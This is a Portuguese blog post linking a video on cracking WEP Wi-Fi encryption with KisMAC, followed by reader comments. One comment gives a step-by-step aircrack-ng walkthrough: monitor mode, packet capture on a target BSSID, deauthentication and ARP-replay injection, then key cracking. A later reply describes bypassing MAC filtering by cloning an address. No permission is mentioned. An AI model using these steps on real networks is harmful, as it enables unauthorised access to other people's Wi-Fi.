quebrando WEP em menos de 10min

Se você tem um MAC e o kisMAC dando sopa, assista este vídeo e veja como as redes wifi são simples de quebrar. Em menos de 10 min o caboclo quebrou a proteção de uma rede wifi.


Publicado

em

por

Tags:

Comentários

12 respostas para “quebrando WEP em menos de 10min”

  1. Avatar de Caio

    Para que se 90% das pessoas nao usão nenhum tipo de codificação ;), so do meu quarto tem 2 desprotegidas…
    Uma pena que kisMET não funciona os os drivers da minha placa de wifi, a muito tempo eu quero fazer isso. 😥
    “veja como as redes wifi são simples de quebrar”
    e voce quer dizer WEP não wifi, eu uso WPA2 com uma chave aleatória de 512 bits, quero ver quem quebra em 10 minutos. 8)

    1. Avatar de luis
      luis

      Pode demorar um pouco mais, mas que dá pra quebrar fácil, isso dá, pra isso que existem os aircrack-ng da vida

  2. Avatar de bernabauer

    é digo WEP mesmo… no titulo até coloquei WEP, mas no artigo acabo generalizando.

  3. Avatar de blaizer
    blaizer

    po se tivesse uma parada dessas para windows seria r0x

  4. Avatar de Torre
    Torre

    Não consegui ver o arquivo

  5. Avatar de tSha
    tSha

    512 bits em 802.11i ? O cara deve ser da nasa…

  6. Avatar de MaSeptimio
    MaSeptimio

    Ah para né! Se é pra mentir vamos mentir menos então rsrsrsrs. Primeiro o Caio me fala em chave de 512bits (só se foi ele que implementou e não divulgou pra ninguém), depois o luis termina de rachar a cara dizendo que “Pode demorar um pouco mais, mas que dá pra quebrar fácil, isso dá, pra isso que existem os aircrack-ng da vida”
    Tudo isso na verdade depende do que o luis entende por fácil, pois se uma chave 128bits razoavelmente elaborada calculando por baixo o kit do aircrack-ng demoraria cerca deeeee hummmmm talvez uns 15 anos, talvez um pouco mais, então uma chave de 512bits (se existisse para esse tipo de equipamento e tecnologia) demoraria fazendo uma média cerca de 15x15x15x15 = um número muito grande de décadas…rsrsrsrs ou seja, impossível não é, mas teríamos que iniciar o processo hoje para que a 8ª geração dos nossos filhos colhessem os resultados, mas tudo bem.

    Agora vamos falar sério, a grande maioria das redes em fio são de baixíssima segurança ou nenhuma, então isso faz com que a vulnerabilidade se torne eminente.

    O processo é relativamente simples tanto para wep encripted quanto para open, basta baixar o BackTrack R4 rodar o live dvd dele, ter de preferência rede cabeada e placa wireless no pc que ele irá rodar, isso facilita e muito.

    Depois você vai usar as ferramentas que ele já traz, são mais de 300 ferramentas para todo tipo de pen test e análise de vulnerabilidade.

    No caso usaremos os seguintes comandos no terminal (shell)

    1 – airmon-ng start wlan0 (isso se sua wireless for a wlan0, normalmente é)

    2 – kismet (para varrer as redes wireless no alcance de sua placa e anotar seu ssid e bssid)

    3 – quem não quiser usar o kismet pode usar o airodump-ng wlan0

    4 – agora vamos ao que interessa

    #airodump-ng -w wep -c [canal da rede de interesse] –bssid [digite aqui o BSSID que vc leu com o kismet] [informe aqui a interface da sua placa wireless que normalmente é wlan0]

    * Agora vai iniciar o procedimento de captura de pacotes, para acelerar o processo é interessante vc desconectar o roteador e forçar que as pessoas se conectem nele novamente, isso fará com que vc consiga mais pacotes, para uma rede open vc precisa de pelo menos 30.000 pacotes, para uma web com encriptação 128bits pelo menos uns 120.000 pacotes.

    5 – aireplay-ng -1 0 -a [BSSID] [INTERFACE]

    6 – aireplay-ng -3 -b [BSSID] [INTERFACE]

    *depois de atingir a quantidade de pacotes desejada é hora de realmente iniciar o procedimento de crack.

    7 – aircrack-ng wep-01.cap [INTERFACE]

    Você também pode usar o método de wordlist para tentar fazer um brute force de palavras pré-estabelecidas e quem sabe conseguir invadir, em outra oportunidade eu ensino a usar um brute force com wordlist.

    Créditos: Márcio Septímio

  7. Avatar de SPARK

    Kra pra que senha em redes WI-FI meu deixa ela lá livre sem segurança cria uma regra interna no router e autoriza apenas os computadores com MAC num é nem IP para ter acesso a rede, Pra min só quem não da conta de montar uma rede bem estruturada coloca senha em redes WIFI. Obg a atenção tente aproveita algo do que disse!

    1. Avatar de Márcio Septímio
      Márcio Septímio

      Bem, se você acha mesmo que criar regra de MAC resolve o problema, então deixe seu roteador aberto pra mim e crie sua regra de MAC, então em cerca de 3 minutos eu faço uma varredura, descubro o número do MAC que está comunicando com o roteador, e faço um clone na minha wireless do seu MAC e adivinha só o que acontece? Pronto, capturei seu endereço MAC e posso navegar pela sua regra como se minha placa wireless fosse a sua.

  8. Avatar de ALLAN
    ALLAN

    Olá..Entendi tudo olhando o vídeo..Tenho um Mac Air e o KisMAC fica travando toda hora. E fiquei na dúvida se é necessário aquelas “anteninhas usb”…Agradeceria se pudesse esclarecer isso pra mim..Desde já obrigado!

    1. Avatar de Márcio Septímio
      Márcio Septímio

      Não se faz necessário as antenas, apesar delas serem muito úteis, mas só em relação ao sinal, seu problema de travamento deve estar relacionado à forma como o está fazendo ou sua wireless mesmo.

Deixe um comentário para tSha Cancelar resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *